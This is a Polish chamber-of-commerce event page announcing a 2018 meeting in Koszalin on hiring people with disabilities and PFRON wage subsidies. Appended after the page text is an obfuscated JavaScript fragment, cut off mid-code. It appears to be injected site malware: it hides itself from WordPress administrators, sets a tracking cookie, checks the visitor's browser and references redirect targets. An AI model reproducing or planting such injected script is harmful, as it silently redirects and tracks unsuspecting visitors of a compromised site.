Korzyści z zatrudniania osób z niepełnosprawnościami – spotkanie | Północna Izba Gospodarcza w Koszalinie

Polnocna-Izba-Koszalin-spotkanie-PFRON

Serdecznie zapraszamy na spotkanie informacyjne o zatrudnianiu osób z niepełnosprawnościami na różnych stanowiskach w tym przy pracy fizycznej.

Termin: 21.02.2018 r.
Miejsce: Restauracja Park Caffe, ul. Asnyka 11, Koszalin
Godzina  11:30, czas trwania 1,5 godziny

Szkolenie przeprowadzą przedstawiciele Państwowego Funduszu Rehabilitacji Osób Niepełnosprawnych ze Szczecina.

Potwierdzenia obecności prosimy wysyłać na adres koszalin@izba.info lub telefonicznie pod numer 537 184 630.

Jeżeli podane godziny szkoleń Państwu nie odpowiadają, bardzo prosimy o informację.

Zatrudnienie niepełnosprawnego pracownika – dofinansowanie do wynagrodzenia

Pracodawcy, który zatrudnia osoby niepełnosprawne, przysługuje ze środków Państwowego Funduszu Rehabilitacji Osób Niepełnosprawnych miesięczne dofinansowanie do wynagrodzeń pracowników niepełnosprawnych, o ile pracownicy ci znajdują się w ewidencji zatrudnionych osób niepełnosprawnych, prowadzonej przez PFRON.

Dofinansowanie przysługuje: każdemu pracodawcy zatrudniającemu osobę niepełnosprawną,

pracodawcy prowadzącemu zakład pracy chronionej, pracodawcy zatrudniającemu co najmniej 25 pracowników w przeliczeniu na pełny wymiar czasu pracy i osiągającemu wskaźnik zatrudnienia osób niepełnosprawnych w wysokości co najmniej 6 % pracodawcom, którzy nie posiadają zaległości w zobowiązaniach wobec Funduszu.

Dofinansowaniem ze środków programu mogą być objęte koszty dotyczące:

 • rekrutacji i rozpoznania potrzeb wynikających z niepełnosprawności,
 • uzyskania przez osobę niepełnosprawną pożądanych kwalifikacji/umiejętności zawodowych oraz pracowniczych,
 • zniwelowania barier uniemożliwiających podjęcie zatrudnienia u potencjalnego pracodawcy (w tym m.in.: sprzętów i urządzeń technicznych, zatrudnienia asystenta lub trenera pracy, dojazdów do pracy,
 • dodatku motywacyjnego rekompensującego podwyższone koszty związane
  z podjęciem aktywności zawodowej osoby niepełnosprawnej,
 • wykorzystania innowacyjnych metod pracy, mających na celu utrzymanie osoby niepełnosprawnej w zatrudnieniu.

 

Na spotkaniu można będzie uzyskać informacje m.in o:

 • zasady obowiązujące w trakcie naboru i weryfikacji formalnej ofert zatrudnienia osób niepełnosprawnych;
 • zasady zawierania porozumienia z potencjalnymi pracodawcami w sprawie współpracy przy realizacji programu;
 • zasady kwalifikowalności kosztów;
 • zasady przekazywania i rozliczania środków PFRON;
 • zasady ogłaszania konkursów dla pracodawców zatrudniających
  osoby niepełnosprawne.

Spotkanie odbędzie się na podstawie programu pilotażowego „Praca-Integracja”.

korzysci-dla-przedsiebiorcow-zzatrudniania-osob-z-niespelnosprawnosciami

Więcej informacji na https://www.facebook.com/events/145948399365258/

  'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m